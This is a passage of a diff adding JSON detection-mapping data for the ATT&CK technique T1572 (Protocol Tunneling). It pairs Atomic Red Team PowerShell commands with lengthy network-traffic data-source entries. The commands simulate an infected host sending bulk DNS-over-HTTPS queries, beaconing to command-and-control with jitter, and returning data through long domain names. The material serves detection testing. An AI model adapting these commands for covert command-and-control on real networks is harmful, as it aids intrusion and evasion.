"IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1572", + "command_list": [ + "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"https://8.8.8.8/resolve?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}\" -UseBasicParsing).Content }\n", + "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"#{doh_server}?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=TXT\" -UseBasicParsing).Content }\n", + "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"#{doh_server}?name=atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}\" -UseBasicParsing).Content }\n", + "for($i=0; $i -le 1000; $i++) { (Invoke-WebRequest \"#{doh_server}?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}\" -UseBasicParsing).Content }\n", + "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"#{doh_server}?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io&type=#{query_type}\" -UseBasicParsing).Content }\n", + "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer https://8.8.8.8/resolve -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + null, + "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain 127.0.0.1.xip.io -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain atomicredteam -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer https://8.8.8.8/resolve -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}\n", + "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT\n", + "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType #{query_type}\n", + "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain 127.0.0.1.xip.io -Subdomain #{subdomain} -QueryType #{query_type}\n" + ], + "commands": [ + { + "command": "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"https://8.8.8.8/resolve?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}\" -UseBasicParsing).Content }\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"#{doh_server}?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=TXT\" -UseBasicParsing).Content }\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"#{doh_server}?name=atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}\" -UseBasicParsing).Content }\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "for($i=0; $i -le 1000; $i++) { (Invoke-WebRequest \"#{doh_server}?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}\" -UseBasicParsing).Content }\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"#{doh_server}?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io&type=#{query_type}\" -UseBasicParsing).Content }\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer https://8.8.8.8/resolve -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": null, + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain 127.0.0.1.xip.io -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain atomicredteam -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer https://8.8.8.8/resolve -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType #{query_type}\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + }, + { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain 127.0.0.1.xip.io -Subdomain #{subdomain} -QueryType #{query_type}\n", + "source": "atomics/T1572/T1572.yaml", + "name": "Atomic Red Team Test - Protocol Tunneling" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1572", + "display_name": "Protocol Tunneling", + "atomic_tests": [ + { + "name": "DNS over HTTPS Large Query Volume", + "auto_generated_guid": "ae9ef4b0-d8c1-49d4-8758-06206f19af0a", + "description": "This test simulates an infected host sending a large volume of DoH queries to a command and control server.\nThe intent of this test is to trigger threshold based detection on the number of DoH queries either from a single source system or to a single targe domain.\nA custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout in a JSON format.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "doh_server": { + "description": "Default DoH resolver", + "type": "String", + "default": "https://8.8.8.8/resolve" + }, + "query_type": { + "description": "DNS query type", + "type": "String", + "default": "TXT" + }, + "subdomain": { + "description": "Subdomain prepended to the domain name", + "type": "String", + "default": "atomicredteam" + }, + "query_volume": { + "description": "Number of DNS queries to send", + "type": "Integer", + "default": "1000" + }, + "domain": { + "description": "Default domain to simulate against", + "type": "String", + "default": "127.0.0.1.xip.io" + } + }, + "executor": { + "command": "for($i=0; $i -le #{query_volume}; $i++) { (Invoke-WebRequest \"#{doh_server}?name=#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}\" -UseBasicParsing).Content }\n", + "name": "powershell" + } + }, + { + "name": "DNS over HTTPS Regular Beaconing", + "auto_generated_guid": "0c5f9705-c575-42a6-9609-cbbff4b2fc9b", + "description": "This test simulates an infected host beaconing via DoH queries to a command and control server at regular intervals over time.\nThis behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.\nA custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout in a JSON format.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "doh_server": { + "description": "Default DoH resolver", + "type": "String", + "default": "https://8.8.8.8/resolve" + }, + "runtime": { + "description": "Time in minutes to run the simulation", + "type": "Integer", + "default": 30 + }, + "domain": { + "description": "Default domain to simulate against", + "type": "String", + "default": "127.0.0.1.xip.io" + }, + "subdomain": { + "description": "Subdomain prepended to the domain name", + "type": "String", + "default": "atomicredteam" + }, + "query_type": { + "description": "DNS query type", + "type": "String", + "default": "TXT" + }, + "c2_interval": { + "description": "Seconds between C2 requests to the command and control server", + "type": "Integer", + "default": 30 + }, + "c2_jitter": { + "description": "Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests", + "type": "Integer", + "default": 20 + } + }, + "executor": { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "name": "powershell" + } + }, + { + "name": "DNS over HTTPS Long Domain Query", + "auto_generated_guid": "748a73d5-cea4-4f34-84d8-839da5baa99c", + "description": "This test simulates an infected host returning data to a command and control server using long domain names.\nThe simulation involves sending DoH queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DoH queries for long domain names over a set threshold.\n Upon execution, DNS information about the domain will be displayed for each callout in a JSON format.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "doh_server": { + "description": "Default DoH resolver", + "type": "String", + "default": "https://8.8.8.8/resolve" + }, + "query_type": { + "description": "DNS query type", + "type": "String", + "default": "TXT" + }, + "subdomain": { + "description": "Subdomain prepended to the domain name (should be 63 characters to test maximum length)", + "type": "String", + "default": "atomicredteamatomicredteamatomicredteamatomicredteamatomicredte" + }, + "domain": { + "description": "Default domain to simulate against", + "type": "String", + "default": "127.0.0.1.xip.io" + } + }, + "executor": { + "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an 